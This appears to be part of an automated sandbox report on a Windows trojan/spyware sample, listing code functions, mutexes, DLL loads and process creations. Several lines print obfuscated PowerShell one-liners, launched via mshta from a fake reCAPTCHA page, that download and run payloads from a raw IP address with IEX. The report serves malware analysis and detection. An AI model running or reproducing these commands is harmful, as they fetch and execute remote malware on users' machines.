                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041107814_2_00411078
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004270D014_2_004270D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043614014_2_00436140
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043912C14_2_0043912C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004091C014_2_004091C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004161DF14_2_004161DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004311E614_2_004311E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043218814_2_00432188
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040619014_2_00406190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042F19514_2_0042F195
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004421B014_2_004421B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041E25014_2_0041E250
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041B20014_2_0041B200
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004042D014_2_004042D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004082A014_2_004082A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004412B114_2_004412B1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041C37014_2_0041C370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004273A014_2_004273A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042044014_2_00420440
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041044614_2_00410446
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041745114_2_00417451
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0044246014_2_00442460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041947014_2_00419470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040740014_2_00407400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043C41014_2_0043C410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040E4B014_2_0040E4B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041A57414_2_0041A574
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004245C014_2_004245C0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004165EE14_2_004165EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041559014_2_00415590
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004095A014_2_004095A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040662014_2_00406620
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040D69014_2_0040D690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041869014_2_00418690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043974A14_2_0043974A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041971014_2_00419710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041F71014_2_0041F710
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041C7D014_2_0041C7D0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004427E014_2_004427E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043B7B014_2_0043B7B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042A81014_2_0042A810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043381014_2_00433810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004058E014_2_004058E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042D89314_2_0042D893
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004148B014_2_004148B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_004288BA14_2_004288BA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041597514_2_00415975
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040A91014_2_0040A910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0044191014_2_00441910
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0040392014_2_00403920
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00441A5614_2_00441A56
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00427A5014_2_00427A50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041BAD014_2_0041BAD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00433AD014_2_00433AD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00431A8814_2_00431A88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00441A9414_2_00441A94
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041AA9014_2_0041AA90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00442A9014_2_00442A90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041CAA014_2_0041CAA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043CAA714_2_0043CAA7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00441B4014_2_00441B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00420B1014_2_00420B10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402B2014_2_00402B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00411B2014_2_00411B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042ABC014_2_0042ABC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00441BD014_2_00441BD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043AC4014_2_0043AC40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00441C6014_2_00441C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00404C0014_2_00404C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042ECD014_2_0042ECD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00439CD814_2_00439CD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00440CD814_2_00440CD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00414C9C14_2_00414C9C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042CCA014_2_0042CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00426D7014_2_00426D70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00428D7614_2_00428D76
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00422D1714_2_00422D17
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00405DC014_2_00405DC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00442DE014_2_00442DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00415E4214_2_00415E42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00423E4414_2_00423E44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00413E5014_2_00413E50
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0041BE0014_2_0041BE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0042DEE514_2_0042DEE5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00402EF014_2_00402EF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043EE8014_2_0043EE80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_0043AEA014_2_0043AEA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00427F8D14_2_00427F8D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00413E40 appears 128 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00407F90 appears 52 times
                  Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winPS1@23/13@11/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_00430050 CoCreateInstance,14_2_00430050
                  Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8444:304:WilStaging_02
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8492:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8340:304:WilStaging_02
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\3e74489724f9
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8492:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8444:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4100:304:WilStaging_02
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8340:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4100:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vv0xvetf.m3y.ps1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.htmlJump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: edgegdi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
